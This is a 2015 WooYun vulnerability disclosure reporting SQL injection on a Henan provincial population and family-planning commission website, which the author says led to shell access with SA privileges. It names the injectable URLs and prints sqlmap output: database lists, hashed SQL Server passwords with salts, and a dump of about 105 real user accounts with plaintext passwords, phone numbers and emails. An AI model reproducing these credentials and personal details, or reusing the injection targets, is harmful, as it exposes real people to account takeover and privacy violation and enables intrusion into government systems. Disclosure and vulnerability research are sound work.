当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137146

漏洞标题:河南省某人口和计划生育委员会主站SQL漏洞并可命令执行(大量用户信息)

相关厂商:河南省某人口和计划生育委员会

漏洞作者: 泪雨无魂

提交时间:2015-08-28 17:51

修复时间:2015-10-12 16:06

公开时间:2015-10-12 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

河南省某人口和计划生育委员会主站SQL漏洞,SA权限已经拿下服务器。。。

详细说明:

注入点:
http://www.xxsjsw.gov.cn/HNWeb/conference/09zrpxbmore.aspx?category=202 存在sql注入漏洞
http://www.xxsjsw.gov.cn/hnweb/conference/08dsdhhymore.aspx?category=156 存在sql注入漏洞

web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [11]:
[*] bakdata
[*] distribution
[*] hnjsw35
[*] hnweb
[*] hx
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
current user: 'sa'
current database: 'hnweb'
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
database management system users password hashes:
[*] distributor_admin [1]:
password hash: 0x0100c4c24a7eadebc6b9ee976addd87d69c36b76fcb988979a4f
header: 0x0100
salt: c4c24a7e
mixedcase: adebc6b9ee976addd87d69c36b76fcb988979a4f
[*] sa [1]:
password hash: 0x01004086ceb6f08d98cbf8632ecff057d2e42f2abc90441ed5c4
header: 0x0100
salt: 4086ceb6
mixedcase: f08d98cbf8632ecff057d2e42f2abc90441ed5c4
Database: hnweb
[28 tables]
+--------------+
| Code |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| HNClass |
| HNFileName |
| HNNews |
| HNUsers |
| HNVideo |
| HnReplyXf |
| HnUserXf |
| HnXingFang |
| RTLCode |
| RTLReport |
| RTLUserLogin |
| __orm__ |
| comd_list |
| comment |
| counts |
| dtproperties |
| guestbook |
| ldemail |
| t_jiaozhu |
| vote |
| webset |
| xiaolu |
| xxzxvote |
| zixun |
+--------------+
Database: hnweb
Table: HNUsers
[11 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| Authority | varchar |
| BM | nvarchar |
| Email | varchar |
| RealName | varchar |
| RegeditTime | datetime |
| Status | char |
| Telephone | varchar |
| UnitName | varchar |
| UserID | int |
| UserName | varchar |
| UserPsw | varchar |
+-------------+----------+
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
Database: hnweb
Table: HNUsers
[105 entries]
+------------------+----------------+-----------------+--------------------------+
| UserName | UserPsw | Telephone | Email |
+------------------+----------------+-----------------+--------------------------+
| 1 | 2 | 1 | 1 |
| xxzxzln | yhw361385 | 65707813 | 123456xxzx@163.com |
| <blank> | <blank> | <blank> | 314844289?COM |
| xpxbcz | 1234567 | 03966222228 | 370894895@qq.com |
| 黑色幽灵 | 666888 | 0396-6222706 | 474634715@qq.com |
| 燃烧的雪 | 6829229 | 0379---66822428 | andy6824918@sina.com |
| asdad | 1 | 43543 | asda@163.com |
| ayivy | 2565833 | ayivy | ayivy@126.com |
| cheng | 1120 | 8680334 | bacbw3535@yahoo.com |
| 清心醉月 | 20050604 | 68825776 | baiyiyuxiao@163.com |
| bamboo1972 | 121315 | 0379-67913675 | bamboo1972@126.com |
| xajsw | 125689 | 037967285612 | banbanmao1@tom.com |
| dhjdjsb | dhjdjsb | 3581148-8013 | bing_sy@sina.com |
| guoderen | 631106 | 65983613 | buyishanren@163.com |
| 秋雨 | 875692 | 0378-4993901 | chunfeng166@163.com |
| 渑池县英豪镇 | 411221 | 0398-4730305 | cjf2658@sina.com |
| 崔平 | 19650103 | 3131910 | CP200193@21CN.COM |
| 草民 | 321321 | 65561997 | csq681123@126.com |
| cxg_009 | 123456 | 03746165516 | cxg_009@tom.com |
| dfjsw | 2872456 | 2872456 | dfwuxiao@126.com |
| 平凡的人 | 198102 | 2546566 | dw945@eyou.com |
| dxyjlf | jlf123 | 3790809 | dxyjlf@800e.net |
| dzjsw | deltree | 0377-66063773 | dzjsw@163.com |
| 雨晴 | <blank> | 无 | dzzz861@sohu.com |
| 丁光辉 | 123456789 | 13343889991 | erhua@126.com |
| <blank> | <blank> | <blank> | gaojiashe?com.tom |
| <blank> | <blank> | <blank> | gaojiashen?tom.com |
| 411025000000 | 111 | 3582513 | gpf6605@163.co0m |
| 月光下的迪斯科 | 007606 | 0398-4700719 | guanluchang@265.com |
| gxqjsw | 2663073 | 2663073 | gxqjsw@tom.com |
| 4936932 | 000 | 13721432158 | ham4936932@21cn.com |
| mtytjk | 82228608222860 | 8222860 | happy0492@sina.com |
| zhang123 | 198612 | 4700997 | hjjswtjk@163.com |
| <blank> | <blank> | <blank> | HJJSWTJK?163.COM |
| 林子 | 780503 | 0372-2995029 | hnaysjsw@163.com |
| 跳跳虎 | 007007 | ******* | hnrklls@163.com |
| hnscjsw | 750110001 | 0396-6962803 | hnscjsw_zb@163.com |
| xyxjsw | 6113019 | 03706113019 | hnxylsl@tom.com |
| ayxjsx | 741218 | 0372-5257522 | houchangzhou@163.com |
| hjt1978 | houjuntao | 03756887002 | houjuntao1978@163.com |
| jacky | 6621353000 | 0376-6608903 | JACKY9910@SOHU.COM |
| lyzjb | 800818 | 13507658848 | jianbing1234@etang.com |
| 佳四 | 1978119 | 5505126 | JQB310@126.com |
| bigfisher2005 | 663526341 | 63526341 | jsqjsw2004@tom.com |
| ngqjsw | lin4xiao3xu4 | 0378-3386879 | kftys@163.com |
| 海阔天空 | 3507674455 | 13507674455 | l3507674455@126.com |
| lcxjsw | 633633 | 0379---66822428 | lcjswlss@126.com |
| 如梦人生 | 760110 | 1234569 | lcx1666@sina.com |
| 漯河 | 411100 | 3131823 | lhtjk@tom.com |
| liuxuejun | 68868399 | 13007536338 | liuxuejun@tcl.com |
| 消逝的王者 | 13569372508 | 13125562389 | long72508@yahoo.com.cn |
| ltqjsw | ltqjsw | 03782883583 | ltqjsw@126.com |
| yuwei0715 | 2890713 | 0398-2187617 | lubaochun1124@sina.com |
| lysjswfgk | 3330455 | 0379-63330455 | lysjsw@126.com |
| 123 | 123456 | 6812345 | lzhl@eyou.com |
| 王虹 | 810517 | 13603431810 | LZJ1982617@.TOM.CN |
| lzsjsw | 312918 | 03726899759 | lzjswtjk@163.com |
| 梦歌 | woshinw | 13838566690 | mengge2005@sina.com |
| nhgct | 7711987 | 03727711987 | nhgct@yeah.net |
| 计生工作 | 19730408 | 3135850 | nqbsc01@vip.371.net |
| pyjsw | pyjsw | 122345 | pyjsw@ton.com |
| ljs82092 | 13839282092 | 13839282092 | pysjswbgs@163.com |
| qiliang | 19850514 | 13721891558 | qiliang2068869@163.com |
| qxlyh | qxlyhdb | 0378-8991697 | qxlyh@126.com |
| qz882 | quitquestions | 3700209 | qzj882@sohu.com |
| rain_favorite | xiyuheng | 13569514093 | rain_favorite@sina.com |
| hnlzlzs | 6043358 | 6043358 | rcjsb@126.com |
| rysdz | 68120006 | 68120006 | rysdz@163.com |
| lyl | 751013 | 0391-35666659 | s3892121 |
| zxd | 751013 | 0391-3566659 | s3892121@126.com |
| s3892121 | 3566659 | 0391-3566659 | s3892121@sina.com |
| smallfan | 000000 | 1 | smallfan@163.com |
| spjswzch | jswzch33 | 0396-4952957 | spjswzch@sina.com |
| SPJSW | spjsw | 0396-4952957 | spyjz686@sina.com |
| 万剑尊者 | 123qaz456 | 0394-5222879 | sqzhaohua@126.com |
| sunwei26 | sunwei | 03913215803 | sunwei26@sina.com |
| t996 | 13837859946 | 13837841529 | t996@tom.com |
| 106556668 | 376955223 | 3232725 | tcd@163.com |
| 信息 | 2826134 | 0373-2826134 | wbqjsw@126.com |
| whtjs701027 | 999999 | 0373-4480860 | whtjs701027@163.com |
| 白楼乡计生办 | 2761017 | 2761017 | wjing_chenw@163.com |
| PYXJSB | 965101 | 62437028 | WODEYOUXIANG8008@263.NET |
| 6183218 | 6183218 | 6183218 | wsdf@tom.com |
| wtu | 413374 | 13818177971 | WTUSVEPYUD@YAHOO.COM.CN |
| wzs | 2666527 | 666666 | wzslhl@yahoo.com |
| WZX | 123456789 | 65707813 | wzxtianlihezai@163.com |
| xcjsw | xcjsw | xcjsw | xcjsw@eyou.com |
| xiangchengrenkou | xiangcheng | 03944296391 | xiangchengrenkou@126.com |
| asdxcv | asdxcv | 037162568022 | xingfumin@sohu.com |
| xyjswcai | caiqing | 03766610196 | xyjswcai@tom.com |
| yangzl | 19660821 | 0391-5612710 | yangzl-002@126.com |
| yanziqyh | 6722978 | 13193939996 | yanziqyh@sina.com |
| 瑶 | 40488 | 135******** | yaoyaox@sina.com |
| 笑笑 | 7801 | 0395-2199671 | yhqldb@sohu.com |
| xcwxc | sangao03 | 13033934027 | yiwangxcwxc@163.com |
| 延津张扬 | 7726109 | 03737695468 | yjrkjswbgs@163.com |
| yljsw | 781016 | 7160799 | yljsw@sohu.com |
| yszhaoln | 665875 | 037967738201 | yszhaoln@yahoo.com.cn |
| yyj212313 | 198006 | 0391-3569350 | yyj212313@126.com |
| zcwxzb | 123456 | 0379--66822428 | zcwxzb@163.com |
| nec | 760509 | 0379---66822428 | zcwxzb163@.com |
| zhqjsw | 111111 | 4942705 | zhqjsw@126.com |
| zhengyang | 123456 | 0396-8910687 | zyxjswq@yahoo.com.cn |
| qlyjsb | 13383858511 | 68786022 | zzunicom6688@163.com |
| 王冠 | 8899 | 03937927003 | 古城乡 |
+------------------+----------------+-----------------+--------------------------+


1.png


2.jpg

3.png

4.png

12.png

6.jpg

7.jpg

8.png

9.png


32.png

漏洞证明:

由于是SA权限直接getshell,然后通过SA权限,拿下服务器。。。

111.jpg

32.png

1232.png

45.jpg


只是检测没有破坏的意思。。。。
求不查水表。。。

修复方案:

你懂的

版权声明:转载请注明来源 泪雨无魂@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-28 16:05

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无